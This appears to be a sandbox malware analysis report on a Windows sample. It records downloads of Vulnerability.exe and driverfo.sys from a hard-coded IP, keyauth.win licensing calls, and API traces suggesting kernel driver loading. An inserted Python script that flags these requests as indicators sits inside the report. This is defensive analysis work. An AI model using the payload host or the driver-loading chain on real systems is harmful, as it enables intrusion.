00 00 10 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00 00 0a 00 00 00 00 00 00 00 00 80 00 00 00 04 00 00 63 5e 00 00 01 00 60 41 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 fc 00 00 00 00 2a 00 00 00 23 00 00 00 70 00 00 24 00 00 00 60 32 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 31 00 00 40 01 00 00 00 00 00 00 00 00 00 00 00 30 00 00 c8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d2 12 00 00 00 10 00 00 00 14 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 68 2e 72 64 61 74 61 00 00 50 06 00 00 00 30 00 00 00 08 00 00 00 18 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 40 00 00 48 2e 64 61 74 61 00 00 00 8c 00 00 00 00 40 00 00 00 02 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c8 2e 70 64 61 74 61 00 00 fc 00 00 00 00 50 00 00 00 02 00 00 00 22 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 48 49 4e 49 54 00 00 00 00 04 03 00 00 00 60 00 00 00 04 00 00 00 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 62 2e 72 65 6c 6f 63 00 00 24 00 00 00 00 70 00 00 00 02 00 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: Joe Sandbox View IP Address: 104.26.0.5
Source: Joe Sandbox View JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Source: global traffic HTTP traffic detected: GET /Vulnerability.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.101.104.122Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /driverfo.sys HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.101.104.122Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 185.101.104.122 (this entry is repeated 50 times in the report)
Source: global traffic DNS traffic detected: DNS query: keyauth.win
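Taken together, the network lines above show a hard-coded payload host: both GET requests go to 185.101.104.122 by literal IP (hence the TCP connections with no matching DNS query), fetch an .exe and a .sys over cleartext HTTP, and carry the IE-compatibility User-Agent plus UA-CPU header that the WinINet/urlmon download APIs send when the caller sets no UA of its own; the INetCache\IE\...\Vulnerability[1].exe and driverfo[1].sys paths further down corroborate that (the "[1]" naming is the WinINet cache). The only DNS query is for keyauth.win, the licensing service the sample talks to over TLS. The script below is an added example, not part of the report: it re-splits the two request lines from the run-together form in which sandbox text exports usually deliver them (header line breaks lost), then applies those three checks. The keyauth.win-to-104.26.0.5 mapping it uses is assumed, since the report lists the query and the TLS peer separately.

```python
"""Re-split the flattened GET requests above and score them as an analyst would.

Added example, not part of the Joe Sandbox report. The inputs are the two
request lines as sandbox text exports deliver them (header line breaks lost)
and the one DNS name the report recorded; the name-to-IP mapping is assumed,
since the report lists the query and the TLS peer separately.
"""
import ipaddress
import re

FLATTENED_REQUESTS = [
    "GET /Vulnerability.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflate"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; "
    ".NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)"
    "Host: 185.101.104.122Connection: Keep-Alive",
    "GET /driverfo.sys HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflate"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; "
    ".NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)"
    "Host: 185.101.104.122Connection: Keep-Alive",
]
DNS_RESOLVED = {"keyauth.win": {"104.26.0.5"}}   # assumed mapping, see lead-in

# Header names to split on. The lookahead cuts right before "Name: ", which is
# safe as long as no header value itself contains one of these names + ": ".
KNOWN_HEADERS = ["Accept-Encoding", "Accept-Language", "Accept", "UA-CPU", "User-Agent",
                 "Host", "Connection", "Cache-Control", "Content-Type", "Content-Length",
                 "Cookie", "Referer", "Range", "Pragma"]
HEADER_SPLIT = re.compile(r"(?=(?:%s): )" % "|".join(map(re.escape, KNOWN_HEADERS)))

PAYLOAD_EXTENSIONS = (".exe", ".sys", ".dll", ".scr")
# IE-compatibility string that WinINet/urlmon send when the caller sets no UA
WININET_UA_PREFIX = "Mozilla/4.0 (compatible; MSIE 7.0;"


def parse_flattened_request(line):
    """Split 'GET /x HTTP/1.1Name: valueName: value...' into its parts."""
    parts = HEADER_SPLIT.split(line)
    method, path, version = parts[0].strip().split(" ")
    headers = {}
    for part in parts[1:]:
        name, _, value = part.partition(": ")
        headers[name] = value
    return {"method": method, "path": path, "version": version, "headers": headers}


def is_literal_ip(host):
    """True for an IPv4/IPv6 literal (an optional :port on IPv4 is tolerated)."""
    if host.count(":") == 1:
        host = host.split(":")[0]
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def assess_request(req, dns_resolved):
    """Return the indicator names that fire for one parsed request."""
    h = req["headers"]
    host = h.get("Host", "")
    resolved = set().union(*dns_resolved.values()) if dns_resolved else set()
    findings = []
    if is_literal_ip(host) and host.split(":")[0] not in resolved:
        findings.append("host-is-literal-ip-without-dns")   # hard-coded payload/C2 host
    if req["path"].lower().endswith(PAYLOAD_EXTENSIONS):
        findings.append("executable-payload-over-http")     # cleartext .exe/.sys fetch
    if h.get("User-Agent", "").startswith(WININET_UA_PREFIX) and "UA-CPU" in h:
        findings.append("wininet-default-user-agent")       # URLDownloadToFile-style client
    return findings


def assess_all(lines, dns_resolved=DNS_RESOLVED):
    """(path, findings) for every request line."""
    out = []
    for line in lines:
        req = parse_flattened_request(line)
        out.append((req["path"], assess_request(req, dns_resolved)))
    return out


if __name__ == "__main__":
    for path, findings in assess_all(FLATTENED_REQUESTS):
        print(path, "->", ", ".join(findings) or "nothing suspicious")
```

Splitting on a fixed list of header names is deliberate: a generic `Word: ` regex would cut "gzip, deflateUser-Agent: ..." at "deflateUser-Agent" and corrupt the Accept-Encoding value, so the parser only trusts names it knows.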
Source: lUAc7lqa56.exe, 00000000.00000003.1796909009.00000245E108A000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E108A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.101.104.122/D
Source: lUAc7lqa56.exe, 00000000.00000002.1934554654.00000245E10BC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.101.104.122/VulneH)C
Source: lUAc7lqa56.exe, 00000000.00000002.1934554654.00000245E1024000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000002.1934554654.00000245E1083000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.101.104.122/Vulnerability.exe
Source: lUAc7lqa56.exe, 00000000.00000002.1934554654.00000245E1024000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.101.104.122/Vulnerability.exe&
Source: lUAc7lqa56.exe, 00000000.00000003.1798879988.00000245E10BD000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1796890061.00000245E10B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.101.104.122/Vulnerability.exeJ)A
Source: lUAc7lqa56.exe, 00000000.00000003.1799028406.00000245E1050000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1796945638.00000245E1050000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.101.104.122/Vulnerability.exeLMEMXxZ
Source: lUAc7lqa56.exe, 00000000.00000003.1796909009.00000245E108A000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E108A000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000002.1934554654.00000245E1083000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.101.104.122/Vulnerability.exeT
Source: lUAc7lqa56.exe, 00000000.00000003.1796945638.00000245E1050000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.101.104.122/Vulnerability.exeZZC:
Source: lUAc7lqa56.exe, 00000000.00000003.1799028406.00000245E1042000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000002.1934985033.00007FF79005B000.00000002.00000001.01000000.00000003.sdmp, lUAc7lqa56.exe, 00000000.00000002.1934554654.00000245E1083000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.101.104.122/driverfo.sys
Source: lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E108A000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000002.1934554654.00000245E1083000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.101.104.122/driverfo.sys$63
Source: lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E108A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.101.104.122/driverfo.sys.122/h
Source: lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E108A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.101.104.122/driverfo.sys.6
Source: lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E108A000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000002.1934554654.00000245E1083000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.101.104.122/driverfo.sysC6
Source: lUAc7lqa56.exe, 00000000.00000002.1934985033.00007FF79005B000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: http://185.101.104.122/driverfo.sysC:
Source: lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E108A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.101.104.122/driverfo.sysH6W
Source: lUAc7lqa56.exe, 00000000.00000003.1799028406.00000245E1050000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.101.104.122/driverfo.sysLMEMHhX
Source: lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E108A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.101.104.122/driverfo.sysM6
Source: lUAc7lqa56.exe, 00000000.00000003.1799028406.00000245E1050000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.101.104.122/driverfo.sysUUC:
Source: lUAc7lqa56.exe, 00000000.00000003.1799028406.00000245E1050000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.101.104.122/driverfo.syst
Source: lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E108A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.101.104.122/driverfo.syst6C
Source: lUAc7lqa56.exe, 00000000.00000003.1796909009.00000245E108A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.101.104.122/h
Source: driverfo[1].sys.0.dr, driverfo.sys.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: lUAc7lqa56.exe, 00000000.00000003.1798879988.00000245E10BD000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E10A5000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798879988.00000245E10B2000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1799010054.00000245E10AF000.00000004.00000020.00020000.00000000.sdmp, driverfo[1].sys.0.dr, driverfo.sys.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: lUAc7lqa56.exe, 00000000.00000003.1798879988.00000245E10BD000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E10A5000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798879988.00000245E10B2000.00000004.00000020.00020000.00000000.sdmp, driverfo[1].sys.0.dr, driverfo.sys.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E10A5000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1799010054.00000245E10AF000.00000004.00000020.00020000.00000000.sdmp, driverfo[1].sys.0.dr, driverfo.sys.0.dr String found in binary or memory: http://certs.apple.com/wwdrg3.der01
Source: driverfo[1].sys.0.dr, driverfo.sys.0.dr String found in binary or memory: http://crl.apple.com/root.crl0
Source: Vulnerability.exe, 00000004.00000000.1821071304.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr, nULoYBmSWb.4.dr String found in binary or memory: http://crl.globalsign.com/gs/gscodesigng2.crl0
Source: Vulnerability.exe, 00000004.00000000.1821071304.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr, nULoYBmSWb.4.dr String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingg2.crl0T
Source: Vulnerability.exe, 00000004.00000000.1821071304.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr, nULoYBmSWb.4.dr String found in binary or memory: http://crl.globalsign.net/root.crl0
Source: driverfo[1].sys.0.dr, driverfo.sys.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: lUAc7lqa56.exe, 00000000.00000003.1798879988.00000245E10BD000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E10A5000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798879988.00000245E10B2000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1799010054.00000245E10AF000.00000004.00000020.00020000.00000000.sdmp, driverfo[1].sys.0.dr, driverfo.sys.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: lUAc7lqa56.exe, 00000000.00000003.1798879988.00000245E10BD000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E10A5000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798879988.00000245E10B2000.00000004.00000020.00020000.00000000.sdmp, driverfo[1].sys.0.dr, driverfo.sys.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: driverfo[1].sys.0.dr, driverfo.sys.0.dr String found in binary or memory: http://ocsp.apple.com/ocsp03-applerootca0.
Source: lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E10A5000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1799010054.00000245E10AF000.00000004.00000020.00020000.00000000.sdmp, driverfo[1].sys.0.dr, driverfo.sys.0.dr String found in binary or memory: http://ocsp.apple.com/ocsp03-wwdrg3010
Source: lUAc7lqa56.exe, 00000000.00000003.1798879988.00000245E10BD000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E10A5000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798879988.00000245E10B2000.00000004.00000020.00020000.00000000.sdmp, driverfo[1].sys.0.dr, driverfo.sys.0.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: driverfo[1].sys.0.dr, driverfo.sys.0.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: lUAc7lqa56.exe, 00000000.00000003.1798879988.00000245E10BD000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E10A5000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798879988.00000245E10B2000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1799010054.00000245E10AF000.00000004.00000020.00020000.00000000.sdmp, driverfo[1].sys.0.dr, driverfo.sys.0.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: Vulnerability.exe, 00000004.00000000.1821071304.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr, nULoYBmSWb.4.dr String found in binary or memory: http://ocsp2.globalsign.com/gscodesigng20
Source: Vulnerability.exe, 00000004.00000000.1821071304.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr, nULoYBmSWb.4.dr String found in binary or memory: http://secure.globalsign.com/cacert/gscodesigng2.crt04
Source: Vulnerability.exe, 00000004.00000000.1821071304.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr, nULoYBmSWb.4.dr String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingg2.crt0
Source: lUAc7lqa56.exe, 00000000.00000002.1934985033.00007FF79005B000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
Source: lUAc7lqa56.exe, 00000000.00000002.1934554654.00000245E1024000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://keyauth.win/api/1.2/
Source: lUAc7lqa56.exe, 00000000.00000002.1934554654.00000245E1024000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://keyauth.win/api/1.2/4-100I
Source: lUAc7lqa56.exe, 00000000.00000002.1934554654.00000245E1024000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://keyauth.win/api/1.2/fo.sysv
Source: lUAc7lqa56.exe, 00000000.00000002.1934985033.00007FF79005B000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://keyauth.win/api/1.2/http://185.101.104.122/Vulnerability.exeC:
Source: Vulnerability.exe, 00000004.00000002.1881188072.000002181DB0F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880478460.000002181DB0E000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1878660285.000002181DB0C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com
Source: lUAc7lqa56.exe, 00000000.00000003.1796909009.00000245E108A000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E108A000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000002.1934554654.00000245E1083000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.comR
Source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879183448.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://vsblobprodscussu5shard10.blob.core.windows.net/
Source: Vulnerability.exe, 00000004.00000003.1879183448.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://vsblobprodscussu5shard10.blob.core.windows.net/Y
Source: Vulnerability.exe, 00000004.00000003.1879912102.000002181DB3E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://vsblobprodscussu5shard10.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/AB6E94A209
Source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879183448.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://vsblobprodscussu5shard10.blob.core.windows.net/qy
Source: lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E10A5000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1799010054.00000245E10AF000.00000004.00000020.00020000.00000000.sdmp, driverfo[1].sys.0.dr, driverfo.sys.0.dr String found in binary or memory: https://www.apple.com/certificateauthority/0
Source: lUAc7lqa56.exe, 00000000.00000002.1935015299.00007FF790082000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.behance.net/madetypeFree
Source: Vulnerability.exe, 00000004.00000000.1821071304.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr, nULoYBmSWb.4.dr String found in binary or memory: https://www.globalsign.com/repository/0
Source: Vulnerability.exe, 00000004.00000000.1821071304.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr, nULoYBmSWb.4.dr String found in binary or memory: https://www.globalsign.com/repository/03
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown HTTPS traffic detected: 104.26.0.5:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: Vulnerability.exe, 00000004.00000003.1878962418.000002181E231000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _stub_UserRegisterRawInputDevices memstr_be539d0e-1

System Summary

Source: lUAc7lqa56.exe Static PE information: .vmp0 and .vmp1 section names
Source: C:\Windows\Vulnerability.exe Code function: 4_2_00007FF7CC422900 RegCreateKeyW,RegSetKeyValueW,RegCloseKey,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,_invalid_parameter_noinfo_noreturn,RegSetKeyValueW,RegCloseKey,RegCloseKey,GetModuleHandleA,GetProcAddress,GetProcAddress,RtlAdjustPrivilege,RtlInitUnicodeString,NtLoadDriver,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@P6AAEAVios_base@1@AEAV21@@Z@Z,??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@J@Z,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, 4_2_00007FF7CC422900
Source: C:\Windows\Vulnerability.exe Code function: 4_2_00007FF7CC4232C0 NtQuerySystemInformation,VirtualFree,VirtualAlloc,NtQuerySystemInformation,VirtualFree,_stricmp,VirtualFree,VirtualFree,_invalid_parameter_noinfo_noreturn, 4_2_00007FF7CC4232C0
Source: C:\Windows\Vulnerability.exe Code function: 4_2_00007FF7CC416810 NtQuerySystemInformation,VirtualFree,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,VirtualFree,DeviceIoControl,DeviceIoControl,DeviceIoControl,DeviceIoControl,memset,DeviceIoControl,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,VirtualFree, 4_2_00007FF7CC416810
Source: C:\Windows\Vulnerability.exe Code function: 4_2_00007FF7CC4145E0: LoadLibraryA,LoadLibraryA,_dupenv_s,_invalid_parameter_noinfo_noreturn,free,SymFromName,_invalid_parameter_noinfo_noreturn,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,_time64,GetCurrentThreadId,srand,rand,rand,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,_invalid_parameter_noinfo_noreturn,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,_wremove,memset,?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@PEBD_J@Z,??7ios_base@std@@QEBA_NXZ,?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z,?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,_wremove,CreateFileW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,DeviceIoControl,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,_invalid_parameter_noinfo_noreturn,SymUnloadModule64,SymCleanup,CloseHandle,CloseHandle,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, 4_2_00007FF7CC4145E0
Source: C:\Users\user\Desktop\lUAc7lqa56.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\driverfo[1].sys Jump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exe File created: C:\Windows\Vulnerability.exe Jump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exe File created: C:\Windows\driverfo.sys Jump to behavior
